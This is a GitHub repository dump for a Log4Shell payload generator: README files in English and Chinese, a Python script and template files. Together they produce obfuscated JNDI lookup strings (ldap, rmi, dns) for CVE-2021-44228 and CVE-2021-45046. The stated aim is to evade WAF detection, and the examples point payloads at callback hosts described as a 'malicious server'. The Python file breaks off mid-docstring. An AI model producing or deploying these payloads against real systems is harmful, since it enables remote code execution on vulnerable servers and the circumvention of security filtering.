├── requirements.txt ├── img ├── help.png ├── primary44228.png ├── primary45046.png ├── secondary44228.png ├── secondary45046.png ├── usage-examples.png ├── burp collaborator client1.png ├── burp collaborator client2.png ├── burp-collaborator-client1.png ├── burp-collaborator-client2.png ├── primary44228secondary44228.png ├── primary45046secondary45046.png └── primary44228-without-server.png ├── secondary_obfuscated_template ├── lookup_prefix_char_obfuscated.txt ├── delimiter_obfuscated.txt ├── lower_case_obfuscated.txt └── upper_case_obfuscated.txt ├── payloads_template ├── cve_2021_45046_payloads_template.txt └── cve_2021_44228_payloads_template.txt ├── primary_obfuscated_template ├── delimiter_obfuscated.txt ├── lower_case_obfuscated.txt └── upper_case_obfuscated.txt ├── LICENSE ├── README-CN.md ├── README.md └── Log4Shell-obfuscated-payloads-generator.py /requirements.txt: -------------------------------------------------------------------------------- 1 | termcolor~=1.1.0 -------------------------------------------------------------------------------- /img/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/help.png -------------------------------------------------------------------------------- /img/primary44228.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary44228.png -------------------------------------------------------------------------------- /img/primary45046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary45046.png -------------------------------------------------------------------------------- /img/secondary44228.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/secondary44228.png -------------------------------------------------------------------------------- /img/secondary45046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/secondary45046.png -------------------------------------------------------------------------------- /img/usage-examples.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/usage-examples.png -------------------------------------------------------------------------------- /img/burp collaborator client1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp collaborator client1.png -------------------------------------------------------------------------------- /img/burp collaborator client2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp collaborator client2.png -------------------------------------------------------------------------------- /img/burp-collaborator-client1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp-collaborator-client1.png -------------------------------------------------------------------------------- /img/burp-collaborator-client2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp-collaborator-client2.png -------------------------------------------------------------------------------- /img/primary44228secondary44228.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary44228secondary44228.png -------------------------------------------------------------------------------- /img/primary45046secondary45046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary45046secondary45046.png -------------------------------------------------------------------------------- /img/primary44228-without-server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary44228-without-server.png -------------------------------------------------------------------------------- /secondary_obfuscated_template/lookup_prefix_char_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Unprefixed Lookup template that replaces the Lookup prefix 2 | ${{{random_lookup}}:{{random_variable}}:-{{uppercase}}} 3 | ${{{random_lookup}}:{{random_variable}}:-{{lowercase}}} 4 | ${:-{{uppercase}}} 5 | ${:-{{lowercase}}} 6 | ${::-{{uppercase}}} 7 | ${::-{{lowercase}}} 8 | {{uppercase}} 9 | {{lowercase}} -------------------------------------------------------------------------------- /payloads_template/cve_2021_45046_payloads_template.txt: -------------------------------------------------------------------------------- 1 | # CVE-2021-45046 payloads template 2 | 
${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//127.0.0.1#{{callback_host}}:1389/{{random}}} 3 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//127.0.0.1#{{callback_host}}/{{random}}} -------------------------------------------------------------------------------- /payloads_template/cve_2021_44228_payloads_template.txt: -------------------------------------------------------------------------------- 1 | # CVE-2021-44228 payloads template 2 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//{{callback_host}}/{{random}}} 3 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//{{callback_host}}} 4 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{r_proto}}{{m_proto}}{{i_proto}}{{colon}}//{{callback_host}}/{{random}}} 5 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{d_proto}}{{n_proto}}{{s_proto}}{{colon}}//{{callback_host}}/{{random}}} -------------------------------------------------------------------------------- /primary_obfuscated_template/delimiter_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Primary Obfuscated Colon Template 2 | : 3 | ${::-:} 4 | ${lower::} 5 | ${k8s:{{random_variable}}:-:} 6 | ${env:{{random_variable}}:-:} 7 | ${ctx:{{random_variable}}:-:} 8 | ${main:{{main_argument_key}}:-:} 9 | ${main:{{random_variable}}:-:} 10 | ${map:{{random_variable}}:-:} 11 | ${sd:{{random_variable}}:-:} 12 | ${sys:{{random_variable}}:-:} 13 | ${web:{{random_variable}}:-:} 14 | ${docker:{{random_variable}}:-:} 15 | ${event:{{random_variable}}:-:} 16 | ${log4j:{{random_variable}}:-:} 17 | ${marker:{{random_variable}}:-:} 18 | ${spring:{{random_variable}}:-:} 19 | ${upper::} 20 | ${:-:} 21 | 
${{{random_lookup}}:{{random_variable}}:-:} -------------------------------------------------------------------------------- /primary_obfuscated_template/lower_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Primary Obfuscated Lowercase Template 2 | {{lowercase}} 3 | ${::-{{lowercase}}} 4 | ${lower:{{lowercase}}} 5 | ${lower:{{uppercase}}} 6 | ${k8s:{{random_variable}}:-{{lowercase}}} 7 | ${env:{{random_variable}}:-{{lowercase}}} 8 | ${ctx:{{random_variable}}:-{{lowercase}}} 9 | ${main:{{main_argument_key}}:-{{lowercase}}} 10 | ${main:{{random_variable}}:-{{lowercase}}} 11 | ${map:{{random_variable}}:-{{lowercase}}} 12 | ${sd:{{random_variable}}:-{{lowercase}}} 13 | ${sys:{{random_variable}}:-{{lowercase}}} 14 | ${web:{{random_variable}}:-{{lowercase}}} 15 | ${docker:{{random_variable}}:-{{lowercase}}} 16 | ${event:{{random_variable}}:-{{lowercase}}} 17 | ${log4j:{{random_variable}}:-{{lowercase}}} 18 | ${marker:{{random_variable}}:-{{lowercase}}} 19 | ${spring:{{random_variable}}:-{{lowercase}}} 20 | ${:-{{lowercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{lowercase}}} -------------------------------------------------------------------------------- /primary_obfuscated_template/upper_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Primary Obfuscated Uppercase Template 2 | {{uppercase}} 3 | ${::-{{uppercase}}} 4 | ${k8s:{{random_variable}}:-{{uppercase}}} 5 | ${env:{{random_variable}}:-{{uppercase}}} 6 | ${ctx:{{random_variable}}:-{{uppercase}}} 7 | ${main:{{main_argument_key}}:-{{uppercase}}} 8 | ${main:{{random_variable}}:-{{uppercase}}} 9 | ${map:{{random_variable}}:-{{uppercase}}} 10 | ${sd:{{random_variable}}:-{{uppercase}}} 11 | ${sys:{{random_variable}}:-{{uppercase}}} 12 | ${web:{{random_variable}}:-{{uppercase}}} 13 | ${docker:{{random_variable}}:-{{uppercase}}} 14 | ${event:{{random_variable}}:-{{uppercase}}} 15 | 
${log4j:{{random_variable}}:-{{uppercase}}} 16 | ${marker:{{random_variable}}:-{{uppercase}}} 17 | ${spring:{{random_variable}}:-{{uppercase}}} 18 | ${upper:{{uppercase}}} 19 | ${upper:{{lowercase}}} 20 | ${:-{{uppercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{uppercase}}} -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 r3kind1e 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /secondary_obfuscated_template/delimiter_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Secondary Obfuscated Colon Template 2 | : 3 | ${::-:} 4 | ${{{l_lookup}}{{o_lookup}}{{w_lookup}}{{e_lookup}}{{r_lookup}}::} 5 | ${{{k_lookup}}{{8_lookup}}{{s_lookup}}:{{random_variable}}:-:} 6 | ${{{e_lookup}}{{n_lookup}}{{v_lookup}}:{{random_variable}}:-:} 7 | ${{{c_lookup}}{{t_lookup}}{{x_lookup}}:{{random_variable}}:-:} 8 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{main_argument_key}}:-:} 9 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{random_variable}}:-:} 10 | ${{{m_lookup}}{{a_lookup}}{{p_lookup}}:{{random_variable}}:-:} 11 | ${{{s_lookup}}{{d_lookup}}:{{random_variable}}:-:} 12 | ${{{s_lookup}}{{y_lookup}}{{s_lookup}}:{{random_variable}}:-:} 13 | ${{{w_lookup}}{{e_lookup}}{{b_lookup}}:{{random_variable}}:-:} 14 | ${{{d_lookup}}{{o_lookup}}{{c_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-:} 15 | ${{{e_lookup}}{{v_lookup}}{{e_lookup}}{{n_lookup}}{{t_lookup}}:{{random_variable}}:-:} 16 | ${{{l_lookup}}{{o_lookup}}{{g_lookup}}{{4_lookup}}{{j_lookup}}:{{random_variable}}:-:} 17 | ${{{m_lookup}}{{a_lookup}}{{r_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-:} 18 | ${{{s_lookup}}{{p_lookup}}{{r_lookup}}{{i_lookup}}{{n_lookup}}{{g_lookup}}:{{random_variable}}:-:} 19 | ${{{u_lookup}}{{p_lookup}}{{p_lookup}}{{e_lookup}}{{r_lookup}}::} 20 | ${:-:} 21 | ${{{random_lookup}}:{{random_variable}}:-:} -------------------------------------------------------------------------------- /secondary_obfuscated_template/lower_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Secondary Obfuscated Lowercase Template 2 | {{lowercase}} 3 | ${::-{{lowercase}}} 4 | ${{{l_lookup}}{{o_lookup}}{{w_lookup}}{{e_lookup}}{{r_lookup}}:{{lowercase}}} 5 | 
${{{l_lookup}}{{o_lookup}}{{w_lookup}}{{e_lookup}}{{r_lookup}}:{{uppercase}}} 6 | ${{{k_lookup}}{{8_lookup}}{{s_lookup}}:{{random_variable}}:-{{lowercase}}} 7 | ${{{e_lookup}}{{n_lookup}}{{v_lookup}}:{{random_variable}}:-{{lowercase}}} 8 | ${{{c_lookup}}{{t_lookup}}{{x_lookup}}:{{random_variable}}:-{{lowercase}}} 9 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{main_argument_key}}:-{{lowercase}}} 10 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{random_variable}}:-{{lowercase}}} 11 | ${{{m_lookup}}{{a_lookup}}{{p_lookup}}:{{random_variable}}:-{{lowercase}}} 12 | ${{{s_lookup}}{{d_lookup}}:{{random_variable}}:-{{lowercase}}} 13 | ${{{s_lookup}}{{y_lookup}}{{s_lookup}}:{{random_variable}}:-{{lowercase}}} 14 | ${{{w_lookup}}{{e_lookup}}{{b_lookup}}:{{random_variable}}:-{{lowercase}}} 15 | ${{{d_lookup}}{{o_lookup}}{{c_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{lowercase}}} 16 | ${{{e_lookup}}{{v_lookup}}{{e_lookup}}{{n_lookup}}{{t_lookup}}:{{random_variable}}:-{{lowercase}}} 17 | ${{{l_lookup}}{{o_lookup}}{{g_lookup}}{{4_lookup}}{{j_lookup}}:{{random_variable}}:-{{lowercase}}} 18 | ${{{m_lookup}}{{a_lookup}}{{r_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{lowercase}}} 19 | ${{{s_lookup}}{{p_lookup}}{{r_lookup}}{{i_lookup}}{{n_lookup}}{{g_lookup}}:{{random_variable}}:-{{lowercase}}} 20 | ${:-{{lowercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{lowercase}}} -------------------------------------------------------------------------------- /secondary_obfuscated_template/upper_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Secondary Obfuscated Uppercase Template 2 | {{uppercase}} 3 | ${::-{{uppercase}}} 4 | ${{{k_lookup}}{{8_lookup}}{{s_lookup}}:{{random_variable}}:-{{uppercase}}} 5 | ${{{e_lookup}}{{n_lookup}}{{v_lookup}}:{{random_variable}}:-{{uppercase}}} 6 | ${{{c_lookup}}{{t_lookup}}{{x_lookup}}:{{random_variable}}:-{{uppercase}}} 7 | 
${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{main_argument_key}}:-{{uppercase}}} 8 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{random_variable}}:-{{uppercase}}} 9 | ${{{m_lookup}}{{a_lookup}}{{p_lookup}}:{{random_variable}}:-{{uppercase}}} 10 | ${{{s_lookup}}{{d_lookup}}:{{random_variable}}:-{{uppercase}}} 11 | ${{{s_lookup}}{{y_lookup}}{{s_lookup}}:{{random_variable}}:-{{uppercase}}} 12 | ${{{w_lookup}}{{e_lookup}}{{b_lookup}}:{{random_variable}}:-{{uppercase}}} 13 | ${{{d_lookup}}{{o_lookup}}{{c_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{uppercase}}} 14 | ${{{e_lookup}}{{v_lookup}}{{e_lookup}}{{n_lookup}}{{t_lookup}}:{{random_variable}}:-{{uppercase}}} 15 | ${{{l_lookup}}{{o_lookup}}{{g_lookup}}{{4_lookup}}{{j_lookup}}:{{random_variable}}:-{{uppercase}}} 16 | ${{{m_lookup}}{{a_lookup}}{{r_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{uppercase}}} 17 | ${{{s_lookup}}{{p_lookup}}{{r_lookup}}{{i_lookup}}{{n_lookup}}{{g_lookup}}:{{random_variable}}:-{{uppercase}}} 18 | ${{{u_lookup}}{{p_lookup}}{{p_lookup}}{{e_lookup}}{{r_lookup}}:{{uppercase}}} 19 | ${{{u_lookup}}{{p_lookup}}{{p_lookup}}{{e_lookup}}{{r_lookup}}:{{lowercase}}} 20 | ${:-{{uppercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{uppercase}}} -------------------------------------------------------------------------------- /README-CN.md: -------------------------------------------------------------------------------- 1 | # Log4Shell-obfuscated-payloads-generator 2 | Log4Shell-obfuscated-payloads-generator可以生成初级混淆的或二级混淆的CVE-2021-44228或CVE-2021-45046 payloads,以规避WAF检测。 3 | 4 | [Log4Shell-obfuscated-payloads-generator的设计思想](https://r3kind1e.github.io/2022/05/26/Log4Shell-obfuscated-payloads-generator/) 5 | 6 | ## 安装 7 | ``` 8 | git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git 9 | ``` 10 | 11 | Log4Shell-obfuscated-payloads-generator在任何平台上都可以在Python 3.x版本中开箱即用。 12 | 13 | ## Usage 14 | 要获取基本选项列表,请使用: 15 | 16 
| ``` 17 | python3 Log4Shell-obfuscated-payloads-generator.py -h 18 | ``` 19 | 20 | 要获取使用示例,请使用: 21 | 22 | ``` 23 | python3 Log4Shell-obfuscated-payloads-generator.py -hh 24 | ``` 25 | 26 | ## Screenshots 27 | `-h`: 获取基本选项列表 28 | ![help](img/help.png) 29 | 30 | `-hh`: 获取使用示例 31 | ![usage-examples](img/usage-examples.png) 32 | 33 | 使用单个选项生成有效负载,`-s`选项指定恶意服务器: 34 | ``` 35 | --generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com 36 | ``` 37 | ![primary44228](img/primary44228.png) 38 | ![burp-collaborator-client1](img/burp-collaborator-client1.png) 39 | 40 | ``` 41 | --generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com 42 | ``` 43 | ![primary45046](img/primary45046.png) 44 | 45 | ``` 46 | --generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com 47 | ``` 48 | ![secondary44228](img/secondary44228.png) 49 | ![burp-collaborator-client2](img/burp-collaborator-client2.png) 50 | 51 | ``` 52 | --generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com 53 | ``` 54 | ![secondary45046](img/secondary45046.png) 55 | 56 | 使用多个选项来生成有效负载,`-s` 选项指定了恶意服务器: 57 | ``` 58 | --generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com 59 | ``` 60 | ![primary44228secondary44228](img/primary44228secondary44228.png) 61 | 62 | 如果不使用`-s`选项指定恶意服务器,`{{callback_host}}`占位符将保留在生成的有效负载中: 63 | ``` 64 | --generate-primary-obfuscated-cve-2021-44228-payload 3 65 | ``` 66 | ![primary44228-without-server](img/primary44228-without-server.png) 67 | ``` 68 | --generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7 69 | ``` 70 | ![primary45046secondary45046](img/primary45046secondary45046.png) 71 | -------------------------------------------------------------------------------- 
/README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell-obfuscated-payloads-generator 2 | Log4Shell-obfuscated-payloads-generator can generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection. 3 | 4 | [The design idea of Log4Shell-obfuscated-payloads-generator](https://r3kind1e.github.io/2022/05/26/Log4Shell-obfuscated-payloads-generator/) 5 | 6 | ## Installation 7 | ``` 8 | git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git 9 | ``` 10 | 11 | Log4Shell-obfuscated-payloads-generator works out of the box with Python version 3.x on any platform. 12 | 13 | ## Usage 14 | To get a list of basic options, use: 15 | 16 | ``` 17 | python3 Log4Shell-obfuscated-payloads-generator.py -h 18 | ``` 19 | 20 | To get usage examples, use: 21 | 22 | ``` 23 | python3 Log4Shell-obfuscated-payloads-generator.py -hh 24 | ``` 25 | 26 | ## Screenshots 27 | `-h`: get a list of basic options 28 | ![help](img/help.png) 29 | 30 | `-hh`: get usage examples 31 | ![usage-examples](img/usage-examples.png) 32 | 33 | Generating payloads with a single option (the `-s` option specifies the malicious server): 34 | ``` 35 | --generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com 36 | ``` 37 | ![primary44228](img/primary44228.png) 38 | ![burp-collaborator-client1](img/burp-collaborator-client1.png) 39 | 40 | ``` 41 | --generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com 42 | ``` 43 | ![primary45046](img/primary45046.png) 44 | 45 | ``` 46 | --generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com 47 | ``` 48 | ![secondary44228](img/secondary44228.png) 49 | ![burp-collaborator-client2](img/burp-collaborator-client2.png) 50 | 51 | ``` 52 | --generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 
3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com 53 | ``` 54 | ![secondary45046](img/secondary45046.png) 55 | 56 | With multiple options to generate payloads, the `-s` option specifies a malicious server: 57 | ``` 58 | --generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com 59 | ``` 60 | ![primary44228secondary44228](img/primary44228secondary44228.png) 61 | 62 | Without specifying a malicious server with the `-s` option, the `{{callback_host}}` placeholder will be preserved in the generated payloads: 63 | ``` 64 | --generate-primary-obfuscated-cve-2021-44228-payload 3 65 | ``` 66 | ![primary44228-without-server](img/primary44228-without-server.png) 67 | ``` 68 | --generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7 69 | ``` 70 | ![primary45046secondary45046](img/primary45046secondary45046.png) 71 | -------------------------------------------------------------------------------- /Log4Shell-obfuscated-payloads-generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # coding=utf-8 3 | import argparse 4 | import os 5 | import string 6 | import sys 7 | import time 8 | import random 9 | 10 | from termcolor import cprint 11 | 12 | parser = argparse.ArgumentParser() 13 | 14 | parser.add_argument("-hh", "--advanced-help", 15 | dest="advanced_help", 16 | help="Usage examples.", 17 | action="store_true") 18 | parser.add_argument("-s", "--server", 19 | dest="server", 20 | help="Malicious Server.", 21 | action='store') 22 | parser.add_argument("--generate-primary-obfuscated-cve-2021-44228-payload", 23 | dest="number_of_generated_primary_obfuscated_cve_2021_44228_payloads", 24 | help="Generate primary obfuscated CVE-2021-44228 payloads based on the specified number. 
Output the " 25 | "results to out/CVE-2021-44228/primary/timestamp-cve_2021_44228-primary-obfuscated_payloads.txt.", 26 | default=argparse.SUPPRESS, 27 | type=int, 28 | action='store') 29 | parser.add_argument("--generate-primary-obfuscated-cve-2021-45046-payload", 30 | dest="number_of_generated_primary_obfuscated_cve_2021_45046_payloads", 31 | help="Generates primary obfuscated CVE-2021-45046 payloads based on the specified number. Output the " 32 | "results to out/CVE-2021-45046/primary/timestamp-cve_2021_45046-primary-obfuscated_payloads.txt.", 33 | default=argparse.SUPPRESS, 34 | type=int, 35 | action='store') 36 | parser.add_argument("--generate-secondary-obfuscated-cve-2021-44228-payload", 37 | dest="number_of_generated_secondary_obfuscated_cve_2021_44228_payloads", 38 | help= "Generate secondary obfuscated CVE-2021-44228 payloads based on the specified number. Output the" 39 | " results to out/CVE-2021-44228/secondary/timestamp-cve_2021_44228-secondary-obfuscated-payloads.txt.", 40 | default=argparse.SUPPRESS, 41 | type=int, 42 | action='store') 43 | parser.add_argument("--generate-secondary-obfuscated-cve-2021-45046-payload", 44 | dest="number_of_generated_secondary_obfuscated_cve_2021_45046_payloads", 45 | help="Generate secondary obfuscated CVE-2021-45046 payloads based on the specified number. 
Output the" 46 | " results to out/CVE-2021-45046/secondary/timestamp-cve_2021_45046-secondary-obfuscated-payloads.txt.", 47 | default=argparse.SUPPRESS, 48 | type=int, 49 | action='store') 50 | 51 | args = parser.parse_args() 52 | 53 | 54 | def print_banner(): 55 | cprint("Log4Shell-obfuscated-payloads-generator: Generate primary obfuscated or secondary obfuscated CVE-2021-44228" 56 | " or CVE-2021-45046 payloads to evade WAF detection.", "yellow") 57 | cprint("Author: r3kind1e", "yellow") 58 | cprint("Blog: https://r3kind1e.github.io/", "yellow") 59 | cprint("Organization: 0range-Sec-Team", "yellow") 60 | cprint("Blog: https://0range-sec-team.github.io/", "yellow") 61 | print() 62 | 63 | 64 | def print_help_msg(): 65 | if len(sys.argv) <= 1: 66 | cprint(f"{os.path.basename(__file__)}: error: missing an option, use -h for basic or -hh for advanced help.", "red") 67 | if args.advanced_help: 68 | cprint("Usage examples: ", "green") 69 | cprint("With a single option to generate payloads, the -s option specifies the malicious server:", "green") 70 | print("--generate-primary-obfuscated-cve-2021-44228-payload 8 -s kbz8tlcz2at7fnbcb9kazo8qwh27qw.oastify.com") 71 | print("--generate-primary-obfuscated-cve-2021-45046-payload 4 -s y43mmz5dvoml814q4ndos214pvvmjb.oastify.com") 72 | print("--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oumccpv3lecbyrugud3eisruflld92.oastify.com") 73 | print("--generate-secondary-obfuscated-cve-2021-45046-payload 7 -s mwmaenx1nce90pwewb5ckqtshjncb1.oastify.com") 74 | print() 75 | cprint("With multiple options to generate payloads, the -s option specifies a malicious server:", "green") 76 | print("--generate-primary-obfuscated-cve-2021-44228-payload 6 --generate-primary-obfuscated-cve-2021-45046-payload 3 -s 58btq69kzvqsc88x8uhvw95bt2zxnm.oastify.com") 77 | print("--generate-primary-obfuscated-cve-2021-44228-payload 2 --generate-secondary-obfuscated-cve-2021-44228-payload 1 -s 378rp48iytpqb67v7sgtv749s0ywml.oastify.com") 78 | 
print("--generate-primary-obfuscated-cve-2021-44228-payload 5 --generate-secondary-obfuscated-cve-2021-45046-payload 4 -s 9blxtaco2ztwfcb1bykzzd8fw623qs.oastify.com") 79 | print("--generate-primary-obfuscated-cve-2021-45046-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 8 -s kth8bluzkab7xntct92ahoqqehkf84.oastify.com") 80 | print("--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7 -s 4ins05jj9u0rm7iwitru68fa3190xp.oastify.com") 81 | print("--generate-secondary-obfuscated-cve-2021-44228-payload 6 --generate-secondary-obfuscated-cve-2021-45046-payload 5 -s k6r8ol7zxao7an6c69fauo3qrhxhl6.oastify.com") 82 | print() 83 | cprint("Without specifying a malicious server with the -s option, the {{callback_host}} placeholder will be preserved in the generated payloads:", "green") 84 | print("--generate-primary-obfuscated-cve-2021-44228-payload 3") 85 | print("--generate-secondary-obfuscated-cve-2021-44228-payload 6 --generate-secondary-obfuscated-cve-2021-45046-payload 5") 86 | print() 87 | 88 | 89 | def load_payloads_template(): 90 | """ 91 | Load the payloads template 92 | """ 93 | read_file_to_list("payloads_template/cve_2021_44228_payloads_template.txt", cve_2021_44228_obfuscated_payloads_template) 94 | read_file_to_list("payloads_template/cve_2021_45046_payloads_template.txt", cve_2021_45046_obfuscated_payloads_template) 95 | 96 | 97 | def get_filepath_template_num(option): 98 | filepath = None 99 | template = None 100 | num = None 101 | timestamp = time.strftime("%Y%m%d_%H%M%S") 102 | if option == 'number_of_generated_primary_obfuscated_cve_2021_44228_payloads': 103 | filename = timestamp + "-cve_2021_44228-primary-obfuscated_payloads.txt" 104 | filepath = "out/CVE-2021-44228/primary/" + filename 105 | template = cve_2021_44228_obfuscated_payloads_template 106 | num = args.number_of_generated_primary_obfuscated_cve_2021_44228_payloads 107 | 108 | if option == 
'number_of_generated_primary_obfuscated_cve_2021_45046_payloads':
        # Tail of get_filepath_template_num(option); its signature and the first branch are above this chunk.
        # `args`, `timestamp`, `random`, `string`, `cprint`, `print_banner`, `print_help_msg` and
        # `load_payloads_template` are all defined or imported earlier in the file, outside this chunk.
        filename = timestamp + "-cve_2021_45046-primary-obfuscated_payloads.txt"
        filepath = "out/CVE-2021-45046/primary/" + filename
        template = cve_2021_45046_obfuscated_payloads_template
        num = args.number_of_generated_primary_obfuscated_cve_2021_45046_payloads

    if option == 'number_of_generated_secondary_obfuscated_cve_2021_44228_payloads':
        filename = timestamp + "-cve_2021_44228-secondary-obfuscated_payloads.txt"
        filepath = "out/CVE-2021-44228/secondary/" + filename
        template = cve_2021_44228_obfuscated_payloads_template
        num = args.number_of_generated_secondary_obfuscated_cve_2021_44228_payloads

    if option == 'number_of_generated_secondary_obfuscated_cve_2021_45046_payloads':
        filename = timestamp + "-cve_2021_45046-secondary-obfuscated_payloads.txt"
        filepath = "out/CVE-2021-45046/secondary/" + filename
        template = cve_2021_45046_obfuscated_payloads_template
        num = args.number_of_generated_secondary_obfuscated_cve_2021_45046_payloads
    # main() treats a None first element as "option is not a generation option"; the None initialisation
    # is presumably at the top of this function, above this chunk -- confirm there.
    return [filepath, template, num]


def generate_obfuscated_payloads(templates: list[str], num: int, is_secondary_obfuscated: bool) -> list[str]:
    """
    Generate a specified number of obfuscated payloads.
    :description: According to the specified number, randomly select the payloads template (sampling is with
    replacement, so the same template can be picked more than once), and replace each placeholder in the selected
